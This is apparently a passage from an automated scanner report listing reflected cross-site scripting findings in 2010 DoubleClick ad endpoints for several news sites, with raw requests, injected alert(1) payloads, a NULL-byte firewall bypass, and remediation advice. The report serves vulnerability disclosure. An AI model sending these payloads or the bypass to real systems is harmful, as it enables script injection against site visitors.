This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/allthingsd.com/general_advertise;tile=%00fc413'-alert(1)-'af096a1586a HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/advertise/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47718
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:04:24 GMT
Expires: Sun, 07 Nov 2010 10:04:24 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c365'-alert(1)-'1340cd21a08 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_bio;tile=6c365'-alert(1)-'1340cd21a08 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/about/voices/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 589
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:06:14 GMT
Expires: Sun, 07 Nov 2010 10:06:14 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f32f'-alert(1)-'0b174cd228f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_comments;tile=2f32f'-alert(1)-'0b174cd228f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/comments/
Cookie: id=228ef07ef3000058|1620481/535815/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:27:52 GMT
Expires: Sun, 07 Nov 2010 09:27:52 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ca4'-alert(1)-'dd0a523311 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_conference;tile=40ca4'-alert(1)-'dd0a523311 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/d/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47854
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:29:28 GMT
Expires: Sun, 07 Nov 2010 09:29:28 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cd2d'-alert(1)-'53c2118d225 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_conference_dive;tile=6cd2d'-alert(1)-'53c2118d225 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/d/dive-into-mobile/?mod=ATD_home_dive
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:04:47 GMT
Expires: Sun, 07 Nov 2010 10:04:47 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ce6'-alert(1)-'408b7171d9b was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_contact;tile=e3ce6'-alert(1)-'408b7171d9b HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/contact/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:04:43 GMT Expires: Sun, 07 Nov 2010 10:04:43 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2538'-alert(1)-'2cd68d761f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_faq;tile=f2538'-alert(1)-'2cd68d761f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/faq/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47854
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:28:39 GMT
Expires: Sun, 07 Nov 2010 09:28:39 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e72c'-alert(1)-'9f650eeb8ae was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_privacy;tile=5e72c'-alert(1)-'9f650eeb8ae HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/privacy/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:05:24 GMT
Expires: Sun, 07 Nov 2010 10:05:24 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9943'-alert(1)-'2c28b6bac73 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_signup;tile=d9943'-alert(1)-'2c28b6bac73 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/signup/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:05:31 GMT
Expires: Sun, 07 Nov 2010 10:05:31 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2f'-alert(1)-'6052c8ee34d was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_terms;tile=83f2f'-alert(1)-'6052c8ee34d HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/terms/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:29:20 GMT
Expires: Sun, 07 Nov 2010 09:29:20 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c82'-alert(1)-'39e03d1d77f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/joblistings;tile=22c82'-alert(1)-'39e03d1d77f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.jobamatic.com/a/jobs/find-jobs
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:30:04 GMT
Expires: Sun, 07 Nov 2010 09:30:04 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae19'-alert(1)-'47a53f04f63 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/kara_front;tile=5ae19'-alert(1)-'47a53f04f63 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://kara.allthingsd.com/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:30:38 GMT
Expires: Sun, 07 Nov 2010 09:30:38 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c86'-alert(1)-'2dfb3ee7892 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_front;tile=26c86'-alert(1)-'2dfb3ee7892 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://walt.allthingsd.com/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:31:34 GMT
Expires: Sun, 07 Nov 2010 09:31:34 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed9a0'-alert(1)-'9326ee9ef41 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_mailboxfront;tile=ed9a0'-alert(1)-'9326ee9ef41 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://mailbox.allthingsd.com/?mod=ATD_skybox
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:31:26 GMT
Expires: Sun, 07 Nov 2010 09:31:26 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45eb9'-alert(1)-'d3fbe3bd686 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_personaltecharchives;tile=45eb9'-alert(1)-'d3fbe3bd686 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://ptech.allthingsd.com/20101027/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:31:24 GMT
Expires: Sun, 07 Nov 2010 09:31:24 GMT
Connection: close
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eec9'%3balert(1)//61b098e61c1 was submitted in the !category parameter. This input was echoed as 6eec9';alert(1)//61b098e61c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front;!category=6eec9'%3balert(1)//61b098e61c1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/public_front;!category=;page=twmoeReload;;mc=0;tile=10;sz=300x250,336x280,300x600;ord=8263826382638263;
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 383
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:08:32 GMT
Expires: Sun, 07 Nov 2010 10:08:32 GMT
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 331b9'%3bfb497608941 was submitted in the !category parameter. This input was echoed as 331b9';fb497608941 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front;!category=331b9'%3bfb497608941 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/public_front;!category=;page=twmoeReload;;mc=0;tile=10;sz=300x250,336x280,300x600;ord=8263826382638263;
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 375
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:32:14 GMT
Expires: Sun, 07 Nov 2010 09:32:14 GMT
1.48. http://ad.doubleclick.net/adj/barrons.com/public_front [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/barrons.com/public_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3981'-alert(1)-'e3b2c8f1463 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front?a3981'-alert(1)-'e3b2c8f1463=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 377
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:29:03 GMT
Expires: Sun, 07 Nov 2010 06:29:03 GMT
Connection: close
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab84'-alert(1)-'992706a3ac8 was submitted in the !category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.50. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/default [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/bottom.interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd8b'-alert(1)-'91d7e574afc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bottom.interactive.wsj.com/default?dfd8b'-alert(1)-'91d7e574afc=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058||t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 374
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 03:07:36 GMT
Expires: Sat, 06 Nov 2010 03:07:36 GMT
Connection: close
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2c0c'%3balert(1)//5290eeaa5b7 was submitted in the columns parameter. This input was echoed as c2c0c';alert(1)//5290eeaa5b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/frontpage;columns=c2c0c'%3balert(1)//5290eeaa5b7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 282
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:01:56 GMT
Expires: Sat, 06 Nov 2010 16:01:56 GMT
1.52. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/frontpage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/brokerbutton.smartmoney.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5268a'-alert(1)-'9e77bdc687b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/frontpage;columns=;contentid=0;pos=4;pagetemplate=0;level2=homepage;tile=4;sz=300x30;ord=1157423771?&5268a'-alert(1)-'9e77bdc687b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 06 Nov 2010 16:02:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 355
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd18'%3b9e07191bf84 was submitted in the columns parameter. This input was echoed as cdd18';9e07191bf84 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/topnav;columns=cdd18'%3b9e07191bf84 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 565
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:01:57 GMT
Expires: Sat, 06 Nov 2010 16:01:57 GMT
1.54. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/topnav [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/brokerbutton.smartmoney.com/topnav
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43980'-alert(1)-'545e96a96dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/topnav;columns=;contentid=0;pos=2;pagetemplate=0;level2=homepage;tile=2;sz=120x30;ord=1157423771?&43980'-alert(1)-'545e96a96dd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
